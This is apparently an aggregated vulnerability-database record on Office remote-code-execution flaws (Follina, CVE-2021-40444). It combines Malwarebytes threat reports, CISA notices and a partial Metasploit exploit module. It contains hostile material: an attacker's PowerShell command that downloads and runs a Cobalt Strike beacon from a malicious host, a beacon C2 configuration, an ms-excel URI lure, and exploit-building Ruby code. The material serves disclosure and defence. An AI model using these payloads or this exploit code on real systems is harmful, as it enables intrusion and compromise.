Under normal circumstances, files from potentially unsafe locations are opened as read-only or in Protected View. However, this warning can be easily bypassed by changing the document to a Rich Text Format (RTF) file. By doing so, the code can run without even opening the document, via the preview tab in Explorer.

While the research is ongoing and the information security community is testing and probing, we are receiving mixed signals about whether the latest, fully patched version of Office 365 is vulnerable to this type of attack. Older versions are certainly vulnerable, which already makes it a problem with a huge attack surface.

Researcher Kevin Beaumont [provides the example](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) where an attacker can send an email with this text as a hyperlink:

    ms-excel:ofv|u|https://blah.com/poc.xls

And Outlook will allow the user to click the hyperlink and open the Excel document.
Because the document isn't attached to the email, and the URI doesn't start with http or https, most email gateways will let it slide straight through, as nothing appears malicious.

As we stated earlier, even looking at a specially crafted file in the preview pane of Windows Explorer could trigger the attack. Microsoft has been made aware of the issues and the possible consequences. While its first reaction was that there was no security issue, it seems this needs to be fixed.

## Mitigation

There are a few things you can do to stop some or all of the "features" used in this type of attack.

### Unregister the ms-msdt protocol

Will Dormann, a vulnerability analyst at the CERT/CC, has [published a registry fix](<https://gist.github.com/wdormann/031962b9d388c90a518d2551be58ead7>) that will unregister the ms-msdt protocol.

Copy and paste the text into a Notepad document:

 * Click on **File**, then **Save As…**
 * Save it to your Desktop, naming the file `disable_ms-msdt.reg` in the file name box.
 * Click **Save**, and close the Notepad document.
 * Double-click the file `disable_ms-msdt.reg` on your desktop.

Note: if you are prompted by User Account Control, select **Yes** or **Allow** so the fix can continue.

 * A message will appear about adding information to the registry; click **Yes** when prompted.
 * A prompt should appear saying that the information was added successfully.

### Disable preview in Windows Explorer

If you have the preview pane enabled, you can:

 * Open File Explorer.
 * Click on the **View** tab.
 * Click on **Preview Pane** to hide it.

The post [Microsoft Office zero-day "Follina"—it's not a bug, it's a feature!
(It's a bug)](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

Published: 2022-05-30 (related CVE: CVE-2022-30190)

_This blog post was authored by Hossein Jazi._

-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_

Several threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks.
The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.

More specifically, we've witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We've also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Besides those known groups, we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy variants of Quasar RAT. These methods include documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables.

On March 23, we identified a new campaign that, instead of targeting Ukraine, is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people who are against the Russian government.

The spear phishing emails warn people who use websites, social networks, instant messengers and VPN services that have been banned by the Russian government that criminal charges will be laid.
Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the "Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation" and "Federal Service for Supervision of Communications, Information Technology and Mass Communications" of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! 
\u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! 
\u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! 
Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: Phishing template \n\n## Victimology\n\nThe actor sent its spear phishing emails to people whose email addresses were on these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * Ministry of Education and Science of the Republic of Altai\n * Ministry of Education of the Stavropol Territory\n * Ministry of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region\n * Ministry of Education of the Irkutsk region\n * Portal of the state and municipal service Moscow region\n * Ministry of Science and Higher Education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in the Russian language and pretend to be from Russia's "Ministry of Information Technologies and Communications of the Russian Federation" and "MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS". One of them is a letter about limiting access to the Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\nThese RTF files contain an embedded URL that downloads an HTML file, which exploits the vulnerability in the MSHTML engine: \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe HTML file contains a script that executes the script in the WSF data embedded in the RTF file. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: HTML file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from Figure 8, the WSF data contains JScript code that can be accessed from a remote location; in this case it is accessed by the downloaded HTML exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this script spawns PowerShell, which downloads a CobaltStrike beacon from the remote server and executes it on the victim's machine (the deployed CobaltStrike file name is Putty). \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n 
\"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses "_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_" (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. 
The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of its communications with its server are Base64 encoded. This RAT starts its activity by setting up some configuration values, which include the C2 URL, intervals, debug mode and a parameter named group that is initialized with "Madagascar", which is probably another alias of the actor. \n\nAfter setting up the configuration, it calls the "Initialize-Engine" function. This function collects the victim's info, including OS info, username, hostname, BIOS info and a host-domain value that shows whether the machine is a domain member or not. It then joins all the collected info into a string separated by the "|" character and appends the group name and the API config value. The resulting string is sent to the server using the _Send-WebInit_ function. This function adds the "INIT%%%" string to the created string, Base64 encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell RAT\n\nAfter performing the initialization, it goes into a loop that keeps calling the "Invoke-Engine" function. This function checks for incoming tasks from the server, decodes them and calls the proper function to execute each task. If there is no task to execute, it sends "GETTASK%%" in Base64 format to its server to show that it is ready to receive and execute tasks. The "IC" command instructs the RAT to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution is sent to the server using the "PUTTASK%%" command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor, highlighting that the different lures are all connected. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets 
Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:09:51", "description": "Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild. 
\n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Microsoft Releases Mitigations and Workarounds for CVE-2021-40444 ", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T00:00:00", "id": "CISA:C70D91615E3DC8B589B493118D474566", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T13:56:12", "description": "Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability\u2014CVE-2022-30190, known as \"Follina\"\u2014affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild.\n\nCISA urges users and administrators to review Microsoft's [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) and apply the necessary workaround. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "cisa", "title": "Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. 
This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' 
]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n 
cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - 